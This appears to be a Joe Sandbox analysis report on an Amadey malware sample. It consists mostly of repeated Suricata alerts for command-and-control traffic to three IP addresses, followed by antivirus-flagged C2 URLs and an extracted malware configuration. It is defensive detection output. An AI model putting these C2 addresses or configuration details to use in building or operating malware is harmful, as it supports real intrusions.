Timestamp:	2024-08-27T14:21:37.549586+0200
SID:	2856148
Severity:	1
Source Port:	52502
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:31.732772+0200
SID:	2856148
Severity:	1
Source Port:	52347
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:22:44.451585+0200
SID:	2856148
Severity:	1
Source Port:	52651
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:44.451585+0200
SID:	2856148
Severity:	1
Source Port:	52656
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:12.635236+0200
SID:	2856148
Severity:	1
Source Port:	52441
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:00.076581+0200
SID:	2856148
Severity:	1
Source Port:	52552
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:19:34.784202+0200
SID:	2856148
Severity:	1
Source Port:	52230
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:31.727775+0200
SID:	2856148
Severity:	1
Source Port:	52624
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:23.701464+0200
SID:	2856148
Severity:	1
Source Port:	52332
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:00.765964+0200
SID:	2856148
Severity:	1
Source Port:	52286
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:20:27.718012+0200
SID:	2856148
Severity:	1
Source Port:	52334
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:25.022636+0200
SID:	2856148
Severity:	1
Source Port:	52609
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:20:03.576412+0200
SID:	2856148
Severity:	1
Source Port:	52284
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:19:26.685437+0200
SID:	2856148
Severity:	1
Source Port:	52214
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:26.625196+0200
SID:	2856148
Severity:	1
Source Port:	52215
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:19:37.161729+0200
SID:	2856148
Severity:	1
Source Port:	52235
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:21.850544+0200
SID:	2856148
Severity:	1
Source Port:	52328
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:53.284285+0200
SID:	2856148
Severity:	1
Source Port:	52677
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:57.210671+0200
SID:	2856148
Severity:	1
Source Port:	52547
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:54.830677+0200
SID:	2856148
Severity:	1
Source Port:	52273
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:58.836131+0200
SID:	2856148
Severity:	1
Source Port:	52550
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:06.519310+0200
SID:	2856148
Severity:	1
Source Port:	52563
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:08.549568+0200
SID:	2856148
Severity:	1
Source Port:	52430
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:23.617605+0200
SID:	2856148
Severity:	1
Source Port:	52604
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:23.920344+0200
SID:	2856148
Severity:	1
Source Port:	52467
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:20.434260+0200
SID:	2856148
Severity:	1
Source Port:	52325
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:30.179204+0200
SID:	2856148
Severity:	1
Source Port:	52223
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:38.690602+0200
SID:	2856148
Severity:	1
Source Port:	52239
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:27.017158+0200
SID:	2856148
Severity:	1
Source Port:	52337
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:25.548861+0200
SID:	2856148
Severity:	1
Source Port:	52472
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:25.686310+0200
SID:	2856148
Severity:	1
Source Port:	52469
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:43.515413+0200
SID:	2856148
Severity:	1
Source Port:	52372
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:47.400877+0200
SID:	2856148
Severity:	1
Source Port:	52257
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:22:04.167934+0200
SID:	2856148
Severity:	1
Source Port:	52554
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:51.144006+0200
SID:	2856148
Severity:	1
Source Port:	52388
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:27.935770+0200
SID:	2856148
Severity:	1
Source Port:	52478
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:27.935770+0200
SID:	2856148
Severity:	1
Source Port:	52477
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:25.500214+0200
SID:	2856148
Severity:	1
Source Port:	52336
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:29.799694+0200
SID:	2856148
Severity:	1
Source Port:	52344
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:38.834931+0200
SID:	2856148
Severity:	1
Source Port:	52363
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:28.342259+0200
SID:	2856148
Severity:	1
Source Port:	52617
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:33.548254+0200
SID:	2856148
Severity:	1
Source Port:	52489
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:12.345108+0200
SID:	2856148
Severity:	1
Source Port:	52308
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:56.269797+0200
SID:	2856148
Severity:	1
Source Port:	52684
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M3 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:35.529320+0200
SID:	2856147
Severity:	1
Source Port:	52232
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:05.656962+0200
SID:	2856148
Severity:	1
Source Port:	52564
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:48.731988+0200
SID:	2856148
Severity:	1
Source Port:	52527
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:19:55.576562+0200
SID:	2856148
Severity:	1
Source Port:	52274
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:05.340281+0200
SID:	2856148
Severity:	1
Source Port:	52296
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:37.724981+0200
SID:	2856148
Severity:	1
Source Port:	52361
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:31.409570+0200
SID:	2856148
Severity:	1
Source Port:	52224
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:21:56.061016+0200
SID:	2856148
Severity:	1
Source Port:	52535
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:17.509511+0200
SID:	2856148
Severity:	1
Source Port:	52450
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:42.055828+0200
SID:	2856148
Severity:	1
Source Port:	52650
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:24.523603+0200
SID:	2856148
Severity:	1
Source Port:	52212
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:15.984083+0200
SID:	2856148
Severity:	1
Source Port:	52588
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:03.186935+0200
SID:	2856148
Severity:	1
Source Port:	52417
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:06.875431+0200
SID:	2856148
Severity:	1
Source Port:	52297
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:19:50.857647+0200
SID:	2856148
Severity:	1
Source Port:	52263
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:35.967776+0200
SID:	2856148
Severity:	1
Source Port:	52497
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:22:40.035794+0200
SID:	2856148
Severity:	1
Source Port:	52644
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:50.619372+0200
SID:	2856148
Severity:	1
Source Port:	52389
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:19.318851+0200
SID:	2856148
Severity:	1
Source Port:	52457
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:59.826425+0200
SID:	2856148
Severity:	1
Source Port:	52410
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:36.181717+0200
SID:	2856148
Severity:	1
Source Port:	52636
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:11.873743+0200
SID:	2856148
Severity:	1
Source Port:	52439
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:22:36.420333+0200
SID:	2856148
Severity:	1
Source Port:	52629
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:01.493399+0200
SID:	2856148
Severity:	1
Source Port:	52414
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:18.354021+0200
SID:	2856148
Severity:	1
Source Port:	52320
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:29.152275+0200
SID:	2856148
Severity:	1
Source Port:	52221
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:31.311116+0200
SID:	2856148
Severity:	1
Source Port:	52484
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:52.017552+0200
SID:	2856148
Severity:	1
Source Port:	52533
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:07.229400+0200
SID:	2856148
Severity:	1
Source Port:	52425
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:45.392615+0200
SID:	2856148
Severity:	1
Source Port:	52375
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:43.099591+0200
SID:	2856148
Severity:	1
Source Port:	52248
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:31.732736+0200
SID:	2856148
Severity:	1
Source Port:	52348
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:21:39.998348+0200
SID:	2856148
Severity:	1
Source Port:	52499
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:03.841964+0200
SID:	2856148
Severity:	1
Source Port:	52419
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:11.603792+0200
SID:	2856148
Severity:	1
Source Port:	52438
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:07.666859+0200
SID:	2856148
Severity:	1
Source Port:	52427
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:46.031910+0200
SID:	2856148
Severity:	1
Source Port:	52379
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:19:28.131038+0200
SID:	2856148
Severity:	1
Source Port:	52220
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:20:19.173872+0200
SID:	2856148
Severity:	1
Source Port:	52321
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:20:27.616419+0200
SID:	2856148
Severity:	1
Source Port:	52339
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:21:53.536640+0200
SID:	2856148
Severity:	1
Source Port:	52538
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 89.23.103.42

Timestamp:	2024-08-27T14:19:39.529274+0200
SID:	2856148
Severity:	1
Source Port:	52234
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.208.158.116

Timestamp:	2024-08-27T14:22:52.417787+0200
SID:	2856148
Severity:	1
Source Port:	52674
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Amadey CnC Activity M4 - Source IP: 192.168.2.6 - Destination IP: 185.209.162.226

Timestamp:	2024-08-27T14:21:01.421529+0200
SID:	2856148
Severity:	1
Source Port:	52411
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://185.208.158.116/hb9IvshS01/index.php	Avira URL Cloud: Label: malware
Source: http://185.208.158.116/hb9IvshS01/index.php.	Avira URL Cloud: Label: malware
Source: http://89.23.103.42/hb9IvshS02/index.php?	Avira URL Cloud: Label: malware
Source: http://185.208.158.116/hb9IvshS01/index.php#	Avira URL Cloud: Label: malware
Source: http://185.208.158.116/hb9IvshS01/index.php/#	Avira URL Cloud: Label: malware
Source: http://89.23.103.42/hb9IvshS02/index.php	Avira URL Cloud: Label: malware

Found malware configuration

Source: 21.2.Hkbsse.exe.6f0e67.1.raw.unpack

Malware Configuration Extractor: Amadey {"C2 url": "185.209.162.226/hb9IvshS03/index.php", "Version": "4.41", "Install Folder": "239f17af5a", "Install File": "Hkbsse.exe"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: 3plugin29563.exe

ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: 3plugin29563.exe

Joe Sandbox ML: detected

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\3plugin29563.exe	Unpacked PE file: 0.2.3plugin29563.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Unpacked PE file: 21.2.Hkbsse.exe.400000.0.unpack

Source: 3plugin29563.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\Desktop\3plugin29563.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0043DB3D FindFirstFileExW,	0_2_0043DB3D
Source: C:\Users\user\Desktop\3plugin29563.exe	Code function: 0_2_0214DDA4 FindFirstFileExW,	0_2_0214DDA4
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0043DB3D FindFirstFileExW,	21_2_0043DB3D
Source: C:\Users\user\AppData\Local\Temp\239f17af5a\Hkbsse.exe	Code function: 21_2_0072DDA4 FindFirstFileExW,	21_2_0072DDA4

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52235 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52230 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52252 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:52232 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52258 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52231 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52284 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52213 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52248 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52223 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52276 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52212 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52251 -> 89.23.103.42:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52339 -> 185.208.158.116:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52225 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52297 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52263 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52348 -> 185.209.162.226:80
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:52333 -> 185.208.158.116:80
